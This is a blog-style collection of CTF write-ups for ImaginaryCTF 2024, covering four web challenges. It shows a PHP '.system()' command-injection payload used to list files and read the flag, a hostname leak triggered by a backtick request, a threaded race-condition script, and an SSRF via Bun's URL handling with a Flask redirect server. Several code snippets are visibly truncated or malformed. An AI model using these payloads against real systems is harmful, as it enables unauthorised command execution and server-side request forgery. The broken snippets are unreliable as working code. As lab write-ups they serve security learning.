Imaginary CTF 2024

Imaginary 2024 writeups

Simple PHP application.
The following code can be used for code execution '.system('<your command>').'

Since the flag contains randomly generated numbers, we print all the files in the root (we know the flag is there from the Dockerfile) ls -la /.

This reveals the flag name flag-cARdaInFg6dD10uWQQgm.txt
Request URL:'.system('ls -la /').'

Pasted image 20240721201623

Now we can cat out the flag.
Request URL:'.system('cat /flag-cARdaInFg6dD10uWQQgm.txt').'

Pasted image 20240721201732

Flag: ictf{assertion_failed_e3106922feb13b10}

This challenge needed to be solved by getting the hostname, this could be seen in the docker-compose.yml file.


version: '3.3'
		hostname: $FLAG
		build: .
			- 10001:80

The hostname is shown if a request is send with a backtick ` after the default request.
Normal: GET / HTTP/1.1
Shows flag:GET /` HTTP/1.1

Pasted image 20240721202524

The challenge is only available via the URL but the source code is available.

As the name suggest, this is a race condition. This can also be verified in the source code, since there is no locking mechanism.

My solution can probably be solved fully automated (and be a LOT more efficient), but I made a few changes to my script when I was stuck in the maze. This was faster then fully automating it at the time.


import requests
import threading

maze_id = "d716edab-bed1-4b54-89fd-a971bcca084b"

# Base URL for the move endpoint
url = f""

# Function to send move requests
def move(direction):
    params = {'id': maze_id, 'move': direction}
    headers = {'Content-Length': '11'}
    data = f'{direction}={direction}'
    response =, params=params, headers=headers, data=data)
    print(f"Moved {direction}: {response.url}")

# Directions to move
directions = ['left', 'down', 'right', 'right', 'right', 'right', 'right', 'right', 'right']

# Create and start threads for concurrent requests
for _ in range(10):
    threads = []
    for direction in directions:
        t = threading.Thread(target=move, args=(direction,))

    # Wait for all threads to complete
    for t in threads:

After running it a few times, I was moving.
Pasted image 20240721205913

Pasted image 20240721205924

After doing that a few more times I got the flag! (don’t have the screenshot at hand right now)

This challenge took by far most of my time. I tried many things such as bruteforcing all characters to look for anomalies and research online.

Challenge code:


const flag = process.env.FLAG || 'ictf{this_is_a_fake_flag}'

	async fetch(req) {
		const url = new URL(req.url)
		if (url.pathname === '/') return new Response('Hello, World!')
		if (url.pathname.startsWith('/flag.txt')) return new Response(flag)
		return new Response(`404 Not Found: ${url.pathname}`, { status: 404 })
	port: 3000
	async fetch(req) {
		if (req.url.includes('flag')) return new Response('Nope', { status: 403 })
		const headerContainsFlag = [...req.headers.entries()].some(([k, v]) => k.includes('flag') || v.includes('flag'))
		if (headerContainsFlag) return new Response('Nope', { status: 403 })
		const url = new URL(req.url)
		if (url.href.includes('flag')) return new Response('Nope', { status: 403 })
		return fetch(new URL(url.pathname +, 'http://localhost:3000/'), {
			method: req.method,
			headers: req.headers,
			body: req.body
	port: 4000 // only this port are exposed to the public

There are 2 servers, and certain checks need to be passed, but eventually we want to pass the following check: if (url.pathname.startsWith('/flag.txt')) return new Response(flag)

The Mozilla developer docs contains much information about the functionality of the URL constructor On the bottom of the page the following section can be found:
Pasted image 20240721203627

The // is where our input ends up


new URL(url.pathname +, 'http://localhost:3000/'

To test if this works I did two tests:


const url = "/vulnerable";
const base = "";
const constructorResult = new URL(url, base);


DuxSec@hi$ bun run main.js

note the two // instead of one / at const url =


const url = "//vulnerable";
const base = "";
const constructorResult = new URL(url, base);


DuxSec@hi$ bun run main.js https://vulnerable/

Now we know that we can make the fetch request go to any URL we desire. For this I created a simple python Flask server, which sends a redirects to the server that contains the flag.txt


import os
from flask import Flask, redirect

app = Flask(__name__)

def hello():
    return redirect("", code=302)

if __name__ == '__main__':'', port=5000)

I hosted this Flask server via NGROK ngrok tcp This is needed so the online challenge website can reach it.
Pasted image 20240721205116

And the final request shows the flag

Pasted image 20240721205302
Flag: ictf{just_a_funny_bug_in_bun_http_handling}